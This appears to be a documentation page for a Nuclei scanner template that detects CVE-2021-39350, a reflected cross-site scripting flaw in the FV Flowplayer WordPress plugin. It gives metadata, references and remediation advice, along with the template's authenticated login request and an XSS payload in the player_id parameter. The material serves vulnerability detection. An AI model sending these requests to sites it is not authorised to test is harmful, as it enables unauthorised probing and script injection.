FV Flowplayer Video Player WordPress plugin - Authenticated Cross-Site Scripting
ID: CVE-2021-39350
Severity: medium
Author: gy741
Tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision
Description
Section titled “Description”The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727.
YAML Source
Section titled “YAML Source”id: CVE-2021-39350
info: name: FV Flowplayer Video Player WordPress plugin - Authenticated Cross-Site Scripting author: gy741 severity: medium description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727. impact: | Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary JavaScript code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the FV Flowplayer Video Player WordPress plugin to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9 - https://nvd.nist.gov/vuln/detail/CVE-2021-39350 - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-39350 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.43162 cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: foliovision product: fv_flowplayer_video_player framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "</script><script>alert(document.domain)</script>" - "<h1>FV Player Stats</h1>" condition: and
- type: word part: header words: - text/html
- type: status status: - 200# digest: 490a0046304402203798ff09e7e5c49476205865e7cd5f451b74b0e913d5644837776714b6f90fd702200a21358dc93ca880c0f9da2c9841182f49d3650914656299e8be2a4b9dc1bf22:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-39350.yaml"